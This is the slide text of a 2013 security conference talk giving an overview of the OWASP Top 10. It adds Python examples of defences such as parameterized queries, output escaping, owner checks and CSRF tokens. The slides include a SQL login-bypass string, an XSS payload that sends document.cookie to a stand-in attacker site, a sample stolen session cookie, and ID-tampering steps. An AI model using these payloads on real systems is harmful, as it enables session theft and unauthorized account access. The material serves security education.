16th Annual Karnataka Conference


16th Annual Karnataka Conference
GRC Compliance to Culture
JULY 19 & 20, 2013
Topic: OWASP Top 10 An Overview
Speakers: Akash Mahajan & Tamaghna Basu

OWASP Top 10 An Overview
The Open Web Application Security Project brings out web security guidance in various forms for the different stakeholders in application security. Whilst the Top 10 Web Risks and Vulnerabilities is their most followed and used document, the awareness level about it is still pretty low. We will cover an overview of the OWASP Top 10 from a security practitioner's point of view and, using a few demonstrations, explain why you and your organization should actively follow and start utilizing this completely free and open resource. Whether you are contemplating starting an Application Security Program or would like to validate what you are already doing, this talk and demonstration will definitely give you something to think about.

OWASP Top 10 An Overview Akash Mahajan and Tamaghna Basu

OWASP Top 10 will enable you to separate signal from the noise

Who follows OWASP Top 10?
National Institute of Standards and Technology (NIST) - USA
National Security Agency (NSA) - USA
Payment Card Industry Security Standards Council - Worldwide
Defence Information Systems Agency (DISA) - USA
Europe Network and Information Security Agency (ENISA) - USA
Other agencies like IEEE, ANSSI France, BSI Germany, Center for Internet Security USA, CPNI UK

All the juicy data is in the app layer now

Vulnerability + Threat = Risk

Untrusted Input: Attack In & Data Out

Untrusted Input

A1 - Injection OWASP Top 10 An Overview

A1 - SQL Injection Normal Login

A1 - SQL Injection Login Successful

A1 - SQL Injection Invalid Username/password

A1 - SQL Injection Type admin'

A1 - SQL Injection DB error: You have an error in SQL syntax

A1 - SQL statement in error details: SELECT * FROM accounts WHERE username = 'admin' AND password = 'admin'

A1 - SQL Injection
What we got: SELECT * FROM accounts WHERE username = 'admin' AND password = 'admin'
SQL statement to bypass validation: SELECT * FROM accounts WHERE username = 'admin' or '1' = '1' AND password = 'admin' or '1' = '1'
Attack vector: admin' or '1' = '1

A1 - SQL Injection admin' or '1' = '1

A1 - SQL Injection Login bypass

A1 - SQL Injection Data extraction

A1 - SQL Injection
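The login bypass above comes from splicing the typed value into the SQL text. The following added example (not code from the talk; the table, column names and password value are constructed) shows the string-built query that the slides' attack vector defeats next to the parameterized form that binds the same input as data, and it catches the database error that the "Type admin'" step leaks.

```python
import sqlite3

def make_db():
    # Constructed in-memory accounts table; the admin row mirrors the slides'
    # demo, the password value is a placeholder.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.execute("INSERT INTO accounts VALUES ('admin', 'placeholder-pw')")
    db.commit()
    return db

def login_vulnerable(db, username, password):
    # String-built query: the input is spliced into the SQL text, so a quote in
    # it ends the literal and the rest is parsed as SQL (the slides' "What we got").
    sql = ("SELECT username FROM accounts WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as e:
        return "DB error: %s" % e   # the verbose error the slides show leaking
    return row[0] if row else None

def login_safe(db, username, password):
    # Parameterized query: values are bound by the driver and never parsed as
    # SQL, so the WHERE clause keeps its structure whatever the input contains.
    row = db.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# The slides' attack vector with its quotes restored (entered in both fields).
BYPASS = "admin' or '1' = '1"
```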

A3 Cross Site Scripting / XSS OWASP Top 10 An Overview

A3 - XSS

A3 - XSS User input is reflected back to the page

A3 - XSS - <script>alert(1)</script>

A3 XSS Script got executed

A3 - XSS - <script>alert(document.cookie)</script>

A3 - XSS Got the cookie

A3 - XSS - What is next? Session Hijacking
<script>window.location="http://www.evilsite.com?cookie="+document.cookie;</script>
http://www.evilsite.com/?cookie=showhints=0;%20username=ed;%20uid=1;%20PHPSESSID=fggru3irrkl@ff6js91uida24
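The reflection and cookie-theft steps above fail when the page encodes what it reflects and the session cookie is flagged HttpOnly. This added example (not from the talk; the page template and session id are constructed, the cookie name follows the slides' PHPSESSID) renders the demo payload both ways and builds the hardened Set-Cookie header.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: the payload from the slides.
REFLECT_PAYLOAD = "<script>alert(document.cookie)</script>"

def render_reflected_unsafe(user_input):
    # What the demo application does: raw input inside the HTML, so the browser
    # treats the payload as markup and runs the script.
    return "<p>You searched for: %s</p>" % user_input

def render_reflected(user_input):
    # Output encoding for an HTML text node: <, >, &, ' and " become entities,
    # so the same payload is displayed as text instead of executed.
    return "<p>You searched for: %s</p>" % html.escape(user_input, quote=True)

def session_cookie_header(session_id):
    # Defence in depth for the cookie-theft step: HttpOnly hides the session id
    # from document.cookie, Secure keeps it off plain HTTP, SameSite limits
    # cross-site sends.
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["httponly"] = True
    c["PHPSESSID"]["secure"] = True
    c["PHPSESSID"]["samesite"] = "Lax"
    return c.output(header="Set-Cookie:")
```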

Authentication Do I really know you?

On the internet nobody knows you are a dog

A2 - Broken Authentication & Session Management OWASP Top 10 An Overview

A2 Login with username ed

A2 Logged in as ed

A2 View Cookie name: uid, value: 16

A2 Change the value: 1

A2 Reload the page, user changed to admin

I am not sure if you are allowed to do that.

A4 Insecure Direct Object Reference OWASP Top 10 An Overview

A4 - Accessing another person's account
https://www.onlinebank.com/user?acct=6065
Attacker notices his acct parameter is 6065: ?acct=6065
He modifies it to a nearby number: ?acct=6066
Attacker views the victim's account information

A7 Missing function level access control OWASP Top 10 An Overview

A7 - Failure to Restrict URL Access Illustrated
Attacker notices the URL indicates his role: /user/getaccounts
He modifies it to another directory (role): /admin/getaccounts, or /manager/getaccounts
Attacker views more accounts than just their own
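The A2 uid-cookie demo, the A4 acct parameter and the A7 URL-role demo share one root cause: the server trusts a client-supplied identifier instead of checking its own records. This added example (not code from the talk; users, accounts 6065/6066 and the URL paths are constructed after the slides) keeps identity in an opaque server-side session and performs an object-level owner check and a function-level role check.

```python
import secrets

# Constructed demo data: accounts with their owners and users with a role.
ACCOUNTS = {6065: {"owner": "ed", "balance": 120},
            6066: {"owner": "victim", "balance": 9000}}
USERS = {"ed": "user", "victim": "user", "admin": "admin"}
SESSIONS = {}   # opaque session id -> username, held only on the server

class Forbidden(Exception): pass
class Unauthenticated(Exception): pass

def login(username):
    # A2: the cookie carries an unguessable token, not the uid, so there is
    # nothing meaningful to "change to 1" on the client side.
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid

def current_user(sid):
    if sid not in SESSIONS:
        raise Unauthenticated()
    return SESSIONS[sid]

def get_account(sid, acct):
    # A4: object-level check, the requested acct's owner must be the session user.
    user = current_user(sid)
    account = ACCOUNTS.get(acct)
    if account is None or account["owner"] != user:
        raise Forbidden()
    return account

def get_accounts(sid, path):
    # A7: function-level check keyed on the server-side role, not the URL text.
    user = current_user(sid)
    if path == "/admin/getaccounts":
        if USERS[user] != "admin":
            raise Forbidden()
        return dict(ACCOUNTS)
    if path == "/user/getaccounts":
        return {k: v for k, v in ACCOUNTS.items() if v["owner"] == user}
    raise Forbidden()   # unknown paths (e.g. /manager/...) are denied by default

def is_denied(fn, *args):
    # Helper for checks: True when the call is refused.
    try:
        fn(*args)
        return False
    except (Forbidden, Unauthenticated):
        return True
```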

A8 Cross Site Request Forgery OWASP Top 10 An Overview

A8 - CSRF?
Diagram: the attacker sends the victim a fake link with some fancy offer; the victim, who has an active connection to the web application, sends a request with his cookie without his knowledge.
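The forged request in the diagram succeeds because the browser attaches the cookie automatically. This added example (not from the talk; the transfer endpoint, form fields and site origin are constructed) shows the server-side checks that break it: a session-bound token the attacker's page cannot read, a POST-only rule so a plain link cannot change state, and an Origin comparison.

```python
import hashlib
import hmac
import secrets

# Constructed per-process key; a real application loads it from configuration.
SECRET_KEY = secrets.token_bytes(32)
SITE_ORIGIN = "https://www.onlinebank.com"   # hypothetical site from the slides

def csrf_token(session_id):
    # Token derived from the session: the victim's browser will attach the
    # cookie to a forged request, but the attacker's page cannot read this
    # value, so it cannot put it in the fake form.
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def handle_transfer(session_id, method, form, origin=None):
    # Returns (status, message) for a state-changing request.
    if method != "POST":
        return 405, "state change requires POST"   # a "fancy offer" link is a GET
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(csrf_token(session_id), supplied):
        return 403, "missing or invalid CSRF token"
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site origin rejected"
    return 200, "transferred %s to %s" % (form["amount"], form["to"])
```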

Security Mistakes: It's funny when it happens to others

You ran the web server as root with 777 for uploads!

A5 - Security Misconfigurations
Network Solutions' shared WordPress hosting:
-rwxrwxrwx 1 root root 0 2010-11-23 08:21 wp-config.php

A6 Sensitive Data Exposure

A9 Using components with known vulnerabilities

Recap
Untrusted Inputs: A1 - Injection; A3 - Cross Site Scripting
Authentication / Authorization: A2 - Broken Authentication & Session Management; A4 - Insecure Direct Object Reference; A7 - Missing function level access control; A8 - Cross Site Request Forgery
Security Mistakes: A5 - Security Misconfiguration; A6 - Sensitive Data Exposure; A9 - Using vulnerable components

Conclusions: Use OWASP and write secure apps

Do you have any questions?
akashmahajan@gmail.com tamaghna.basu@gmail.com